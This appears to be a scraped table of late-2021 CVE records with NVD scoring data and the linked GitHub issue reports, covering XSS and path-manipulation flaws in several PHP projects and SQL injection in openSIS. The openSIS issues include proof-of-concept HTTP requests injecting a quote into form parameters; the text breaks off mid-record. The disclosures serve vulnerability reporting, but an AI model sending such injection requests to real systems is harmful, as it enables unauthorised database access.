The good news is that I have already pushed the fix for this issue (#121). If an object to be downloaded has a key that would land outside of the `--dump-dir`, the file won't be downloaded. The user will get a message that looks like this:
<img src="https://user-images.githubusercontent.com/3712226/143785638-d1c87e52-800a-4eba-9ec5-c5f02da96d69.png" alt="Screenshot showing the command-line output of trying to dump the bucket referenced above which contains bad object keys. S3Scanner has skipped the files with relative path characters in their keys." />
I'll be drafting the v2.0.2 release to push out this update across the git repo, PyPi package, and Docker image. | CVE-2021-32061: Path Traversal via dump of malicious bucket | https://api.github.com/repos/sa7mon/S3Scanner/issues/122/comments | 0 | 2021-11-28T21:06:52Z | 2021-11-28T21:10:49Z | https://github.com/sa7mon/S3Scanner/issues/122 | 1,065,436,114 | 122 | 2,808 |
CVE-2021-43698 | 2021-11-29T12:15:08.217 | phpWhois (last update Jun 30 2021) is affected by a Cross Site Scripting (XSS) vulnerability. In file example.php, the exit function will terminate the script and print the message to the user. The message will contain $_GET['query'] then there is a XSS vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/sparc/phpWhois.org/issues/21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/sparc/phpWhois.org/issues/21"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpwhois_project:phpwhois:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2C29BBA5-ADD5-4475-96FA-1D07395102C0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/sparc/phpWhois.org/issues/21 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"sparc",
"phpWhois.org"
] | Hello,
I would like to report for XSS vulnerability.
In file example.php
```php
\\ line 38
$query = $_GET['query'];
\\ line 64
$resout = str_replace('{query}', $query, $resout);
\\ line 111
$resout = str_replace('{result}', $winfo, $resout);
\\ line 117
exit(str_replace('{results}', $resout, $out));
```
exit function will terminate the script and print the message to the user. The message will contain $_GET['query'] then there is XSS vulnerability. | Possible XSS vulnerability | https://api.github.com/repos/sparc/phpWhois.org/issues/21/comments | 2 | 2021-11-15T00:27:17Z | 2022-02-22T07:31:38Z | https://github.com/sparc/phpWhois.org/issues/21 | 1,053,087,598 | 21 | 2,809 |
CVE-2021-43696 | 2021-11-29T13:15:07.407 | twmap v2.91_v4.33 is affected by a Cross Site Scripting (XSS) vulnerability. In file list.php, the exit function will terminate the script and print the message to the user. The message will contain $_REQUEST then there is a XSS vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/happyman/twmap/issues/57"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/happyman/twmap/issues/57"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:twmap_project:twmap:2.91_4.33:*:*:*:*:*:*:*",
"matchCriteriaId": "BB593BAE-5F9E-4F5B-B04C-EA5D8170B58C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/happyman/twmap/issues/57 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"happyman",
"twmap"
] | Hello,
I would like to report for XSS vulnerability.
In file https://github.com/happyman/twmap/blob/master/twmap_gen/list.php line 33
```php
$response['sEcho'] = $_REQUEST['sEcho'];
// ...
//print_r($_REQUEST);
exit(json_encode($response));
```
exit function will terminate the script and print a message which has $_REQUEST. Then there is XSS vulnerability | Possible XSS vulnerability | https://api.github.com/repos/happyman/twmap/issues/57/comments | 3 | 2021-11-14T23:34:42Z | 2022-01-03T07:19:10Z | https://github.com/happyman/twmap/issues/57 | 1,053,073,424 | 57 | 2,810 |
CVE-2021-43697 | 2021-11-29T13:15:07.447 | Workerman-ThinkPHP-Redis (last update Mar 16, 2018) is affected by a Cross Site Scripting (XSS) vulnerability. In file Controller.class.php, the exit function will terminate the script and print the message to the user. The message will contain $_GET{C('VAR_JSONP_HANDLER')] then there is a XSS vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:workerman-thinkphp-redis_project:workerman-thinkphp-redis:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DA1CF84A-B20D-42B5-B355-5A1E57BEF17E",
"versionEndExcluding": "2018-03-16",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"happyliu2014",
"Workerman-ThinkPHP-Redis"
] | Hello,
I would like to report for XSS vulnerability.
In file https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/blob/master/wmchat/ThinkPHP/Mode/Api/Controller.class.php line 70
```php
$handler = isset($_GET[C('VAR_JSONP_HANDLER')]) ? $_GET[C('VAR_JSONP_HANDLER')] : C('DEFAULT_JSONP_HANDLER');
exit($handler.'('.json_encode($data).');');
```
exit function will terminate the script and print a message which has $_GET[C('VAR_JSONP_HANDLER')]. Then there is XSS vulnerability. | Possible XSS vulnerability | https://api.github.com/repos/happyliu2014/Workerman-ThinkPHP-Redis/issues/1/comments | 1 | 2021-11-14T23:42:27Z | 2024-02-02T23:14:00Z | https://github.com/happyliu2014/Workerman-ThinkPHP-Redis/issues/1 | 1,053,074,997 | 1 | 2,811 |
CVE-2021-43695 | 2021-11-29T14:15:08.160 | issabelPBX version 2.11 is affected by a Cross Site Scripting (XSS) vulnerability. In file page.backup_restore.php, the exit function will terminate the script and print the message to the user. The message will contain $_REQUEST without sanitization, then there is a XSS vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/IssabelFoundation/issabelPBX/issues/33"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/IssabelFoundation/issabelPBX/issues/33"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:issabel:pbx:2.11:*:*:*:*:*:*:*",
"matchCriteriaId": "BA2BC7AA-F116-4605-BD1D-C1B695E4685A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/IssabelFoundation/issabelPBX/issues/33 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"IssabelFoundation",
"issabelPBX"
] | Hello,
I would like to report for XSS vulnerability.
The path of the vulnerability:
In file https://github.com/IssabelFoundation/issabelPBX/blob/master/backup/page.backup_restore.php
```php
// line 16
$var[$k] = isset($_REQUEST[$k]) ? $_REQUEST[$k] : $v;
// line 143
dbug($_SESSION['backup_restore_path'], $var);
```
In file customappsreg/functions.inc.php
https://github.com/IssabelFoundation/issabelPBX/blob/master/framework/amp_conf/htdocs/admin/libraries/utility.functions.php
```php
// line 296
function dbug(){
// ...
$opts = func_get_args();
// ...
switch (count($opts)) {
case 1:
$msg = $opts[0];
break;
case 2:
if ( is_array($opts[0]) || is_object($opts[0]) ) {
$msg = $opts[0];
$dump = $opts[1];
} else {
$disc = $opts[0];
$msg = $opts[1];
}
break;
case 3:
$disc = $opts[0];
$msg = $opts[1];
$dump = $opts[2];
break;
}
// ...
if ($dump==1) {//force output via var_dump
ob_start();
var_dump($msg);
$msg=ob_get_contents();
ob_end_clean();
dbug_write($msg."\n\n\n");
} elseif(is_array($msg) || is_object($msg)) {
dbug_write(print_r($msg,true)."\n\n\n");
} else {
dbug_write($msg."\n\n\n");
}
}
```
$msg carry the value from $_REQUEST without sanitization. Then there is XSS vulnerability.
| Possible XSS vilnerability | https://api.github.com/repos/IssabelFoundation/issabelPBX/issues/33/comments | 1 | 2021-11-14T17:09:49Z | 2022-07-11T19:11:14Z | https://github.com/IssabelFoundation/issabelPBX/issues/33 | 1,052,990,688 | 33 | 2,812 |
CVE-2021-43691 | 2021-11-29T16:15:07.550 | tripexpress v1.1 is affected by a path manipulation vulnerability in file system/helpers/dompdf/load_font.php. The variable src is coming from $_SERVER["argv"] then there is a path manipulation vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/toocool/tripexpress/issues/40"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/toocool/tripexpress/issues/40"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tripexpress_project:tripexpress:1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "AECA2885-0C6F-4755-9C10-84FDE144C9C0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/toocool/tripexpress/issues/40 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"toocool",
"tripexpress"
] | Hello,
I would like to report for path manipulation vulnerability.
The path of the vulnerability.
In file system/helpers/dompdf/load_font.php
```php
// line 171
call_user_func_array("install_font_family", array_slice($_SERVER["argv"], 1));
```
line 66
```php
function install_font_family($fontname, $normal, $bold = null, $italic = null, $bold_italic = null) {
// ...
$fonts = compact("normal", "bold", "italic", "bold_italic");
// ...
// Copy the files to the font directory.
foreach ($fonts as $var => $src) {
// ...
if ( !copy($src, $dest) )
//...
}
```
The variable src is coming from $_SERVER["argv"]. Then there is path manipulation vulnerability.
| Possible path manipulation vulnerability | https://api.github.com/repos/toocool/tripexpress/issues/40/comments | 1 | 2021-11-13T17:44:22Z | 2021-12-02T19:52:44Z | https://github.com/toocool/tripexpress/issues/40 | 1,052,733,215 | 40 | 2,813 |
CVE-2021-41677 | 2021-11-30T13:15:07.537 | A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php &Grade= parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/202"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/202"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/OS4ED/openSIS-Classic/issues/202 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php Grade= parameter

POC

#
REQUEST
```
POST /Modules.php?modname=students/AdvancedReport.php&modfunc=&search_modfunc=list&next_modname=students/AdvancedReport.php HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 850
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1
last=ad&first=a%CC%81cd&stuid=adc&altid=123&addr=dsca&grade='§ion=&w_course_period_id=27&marking_period_id=&activity_id=&absences_term=FY&absences_low=&absences_high=&list_gpa=Y&gpa_term=19&gpa_low=&gpa_high=&cgpa=Y&cgpa_low=&cgpa_high=&month_include_active_date=09&day_include_active_date=01&year_include_active_date=2021&class_rank_term=CUM&class_rank_low=&class_rank_high=&letter_grade_exclude=Y&letter_grade_term=19&letter_grade%5B8%5D=Y&sql_save_session=true&mp_comment=&month_from_birthdate=&day_from_birthdate=&month_to_birthdate=&day_to_birthdate=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&address_group=Y
```
RESPONSE
```
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
<b>SQL:</b></TD>
<TD>SELECT COUNT(s.STUDENT_ID) AS STUDENT_COUNT FROM students s ,student_enrollment ssm LEFT OUTER JOIN student_address sam ON (ssm.STUDENT_ID=sam.STUDENT_ID AND sam.TYPE='Home Address' ) ,schedule w_ss WHERE ssm.STUDENT_ID=s.STUDENT_ID AND ssm.SYEAR='2023' AND (ssm.START_DATE IS NOT NULL AND ('2021-09-22'<=ssm.END_DATE OR ssm.END_DATE IS NULL) OR ssm.DROP_CODE=33 ) AND ssm.SYEAR='2023' AND ssm.SCHOOL_ID='1' AND w_ss.STUDENT_ID=s.STUDENT_ID AND w_ss.SYEAR=ssm.SYEAR AND w_ss.SCHOOL_ID=ssm.SCHOOL_ID AND w_ss.COURSE_PERIOD_ID='27' AND ('2021-09-22' BETWEEN w_ss.START_DATE AND w_ss.END_DATE OR w_ss.END_DATE IS NULL) AND NOT EXISTS (SELECT '' FROM student_report_card_grades sg3 WHERE sg3.STUDENT_ID=ssm.STUDENT_ID AND sg3.SYEAR=ssm.SYEAR AND sg3.REPORT_CARD_GRADE_ID IN ('8')AND sg3.MARKING_PERIOD_ID='19' ) AND s.IS_DISABLE IS NULL AND ssm.STUDENT_ID = 'adc' AND LOWER(s.ALT_ID) LIKE '123%' AND LOWER(s.LAST_NAME) LIKE 'ad%' AND LOWER(s.FIRST_NAME) LIKE 'ácd%' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=NULL'') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'dsca%' OR LOWER(sam.STATE)='dsca' OR ZIPCODE LIKE 'dsca%')</TD>
</TR>
</TR><TR>
<TD align=right><b>Traceback:</b></TD>
<TD>/var/www/opensis/functions/GetStuListFnc.php at 680</TD>
</TR>
</TR><TR>
<TD align=right><b>Additional Information:</b></TD>
<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'd...' at line 1</TD>
</TR>
[...]
```
SOLUTION
Use function sqlSecurityFilter() before assign $_REQUEST['grade'] to query.
the code should look like:
```
if ($_REQUEST['grade']) {
$grade=sqlSecurityFilter($_REQUEST['grade'])
$allSQL .= ' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title= \'' . singleQuoteReplace("'", "\'", $grade . '\')';
}
```
| SQL injection in multiple functions | https://api.github.com/repos/OS4ED/openSIS-Classic/issues/202/comments | 5 | 2021-09-22T07:15:59Z | 2023-01-02T07:13:23Z | https://github.com/OS4ED/openSIS-Classic/issues/202 | 1,003,921,724 | 202 | 2,814 |
CVE-2021-41678 | 2021-11-30T14:15:07.830 | A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff{TITLE] parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/203"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/203"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20B5286C-4CFF-4710-8D23-C76669FADFE7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/OS4ED/openSIS-Classic/issues/203 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff[TITLE] parameter.


POC

REQUEST
```
POST /Modules.php?modname=users/Staff.php&include=DemographicInfoInc&category_id=1&modfunc=update HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42647140374471146523868129
Content-Length: 132296
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=1
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[TITLE]"
'
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[FIRST_NAME]
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[MIDDLE_NAME]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[LAST_NAME]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[NAME_SUFFIX]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ALTERNATE_ID]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[GENDER]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="month_staff[BIRTHDATE]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="day_staff[BIRTHDATE]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="year_staff[BIRTHDATE]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ETHNICITY_ID]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PRIMARY_LANGUAGE_ID]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[SECOND_LANGUAGE_ID]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[THIRD_LANGUAGE_ID]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[EMAIL]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PHYSICAL_DISABILITY]"
N
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[DISABILITY_DESC]"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="file"; filename="alf\'a.php"
Content-Type: image/png
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="imgblob"
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="upbtn"
UPLOAD
-----------------------------42647140374471146523868129--
```
RESPONSE
```
